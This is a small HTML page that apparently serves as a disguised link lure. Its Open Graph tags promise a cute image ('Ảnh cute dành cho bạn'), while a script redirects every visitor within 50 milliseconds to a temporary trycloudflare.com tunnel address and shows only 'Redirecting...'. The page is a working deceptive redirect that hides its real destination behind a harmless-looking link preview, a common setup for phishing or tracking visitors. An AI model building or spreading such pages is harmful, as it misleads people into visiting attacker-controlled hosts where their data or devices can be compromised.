<!DOCTYPE html>
<html>
<html>
<head>
<meta charset="UTF-8">

<title>Hello </title>

<meta property="og:title" content="Hello">
<meta property="og:description" content="Ảnh cute dành cho bạn">

<meta property="og:image"
content="https://iconcute.github.io/image-host/cute.jpg">

<meta property="og:type" content="website">

<script>
setTimeout(() => {
location.href="https://plumbing-encounter-rock-receive.trycloudflare.com";
}, 50);
</script>

</head>

<body>

<h2>Đang chuyển hướng...</h2>

</body>
</html>
```

